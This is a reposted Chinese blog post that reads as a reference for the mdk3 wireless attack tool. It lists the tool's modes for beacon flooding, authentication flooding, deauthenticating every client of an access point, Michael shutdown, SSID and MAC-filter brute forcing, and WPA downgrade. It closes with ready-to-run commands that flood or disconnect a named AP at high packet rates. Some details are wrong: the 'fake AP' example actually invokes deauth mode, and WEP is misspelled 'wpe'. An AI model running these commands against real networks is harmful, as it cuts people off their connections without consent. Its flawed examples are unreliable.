无线攻击之mdk3

mdk3 <interface> <test_mode> [test_options]
  • b   发射伪造的AP,可能造成网络扫描程序或者驱动程序崩溃。
  • -n <ssid> 指定ssid,否则随机生产。
  • -f <filename>从文件中读取ssid。
  • -v <filename>从文件在读取Mac地址和ssid。
  • -d 显示站点为点对点( Ad-Hoc)。
  • -w 设置为wep加密模式。
  • -g 显示站点为54 Mbit。
  • -t 显示站点为wpa TKIP加密。
  • -a 显示站点为wpe AES加密。
  • -m 使用OUI数据库的有效MAC地址。
  • -h AP是伪造则信道跳动,便于测试某些设备和驱动程序,但是信道跳动降低了分组速率。
  • -c <chan> 在此信道伪造AP,如果你想要你的网卡也跳到这个信道则必须设置-h。
  • -s <pps> 每秒发包速率 默认为50.
  • a 身份验证DoS攻击。
  • -a <ap_mac> 只攻击指定MAC AP。
  • -m 使用OUI数据库的有效MAC地址。
  • -c 不检测是否成功。
  • -i <ap_mac> 在AP上智能测试,-a和-c选项将忽略。
  • -s <pps> 发包率 默认不限制。
  • p 基本侦测和ESSID穷举。
  • -e <ssid> 指定ssid
  • -f <filename> 从文件读取ssid并且BF算法匹配隐藏的ssid(BF=brute force)。
  • -t <bssid> 设置目标AP的MAC地址。
  • -s <pps> 发包率,默认无限制,BF为300
  • -b <character set> 字符集,使用完整的BF模式(建议仅使用short SSIDs)。
  • d 解除认证,把连接AP的每个人都踢掉。
  • -w <filename> 白名单MAC地址文件,免受攻击。
  • -b <filename> 黑名单MAC地址文件,攻击对象。
  • -s <pps> 发包率,默认不限制。
  • -c [chan,chan,chan,...] 信道跳动,没5秒一次。
  • m  Michael shutdown ,连续取消所有流量。
  •  -t <bssid>设置目标AP的MAC地址。
  • -w <seconds> 每次爆破间隔时间,默认10。
  • -n <ppb> 每次爆破发送包,默认70。
  • -j 使用新的TKIP Qos-Exploit 仅需要几个包就可以关闭AP。
  • -s <pps> 发包率,默认400。
  • x 802.1x测试。

0 基于洪水测试

  • -n <ssid>
  • -t <bssid>
  • -w <WPA type> 设置WPA类型 (1: WPA, 2: WPA2/RSN; default: WPA)
  • -u <unicast cipher> 设置单播类型(1: TKIP, 2: CCMP; default: TKIP)
  • -m <multicast cipher>设置组播类型(1: TKIP, 2: CCMP; default: TKIP)
  • -s <pps> 默认400

1 基于注销测

  • -t <bssid>
  • -c <bssid>
  • -s <pps> 默认400
  • w WIDS/WIPS/WDS多认证搅乱路由表。
  • -e <SSID>
  • -c [chan,chan,chan...]
  • -z 激活Zero_Chaos' WIDS开发。
  • f MAC地址过滤暴力破解。对已知的客户端MAC地址尝试在动态变化时对给定AP进行身份验证
  •  -t <bssid>
  • -m <mac> 设置MAC地址使用范围(3 bytes, i.e. 00:12:34)没有-m选项将使用内部数据库
  • -f <mac> 设置MAC地址的开始,-f和-m不能同时使用。
  • g WPA降级测试,不验证站点和AP发送WPA加密的数据包,尝试设置为WPE加密或者不加密,mdk3会让WPE或者未加密的客户端工作。所以不能认定为WPA是不好的。可以集合社工的方式。
  •   -t <bssid>

用例

##mdk3 源码地址git://git.kali.org/packages/mdk3.git
#开始监听无线网卡
airmon-ng start wlan0
#扫描APxinxi
airodump-ng mon0
#发射伪造AP
mdk3 mon0 d -n test_mdk3 -a -m -c 11
#身份验证攻击
mdk3 mon0 a -a D4:A1:48:EB:75:B4
#踢出链接附近AP的所有人
mdk3 mon0 d -s 1000 -c 11

 

转载于:https://my.oschina.net/pirtt/blog/918707

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值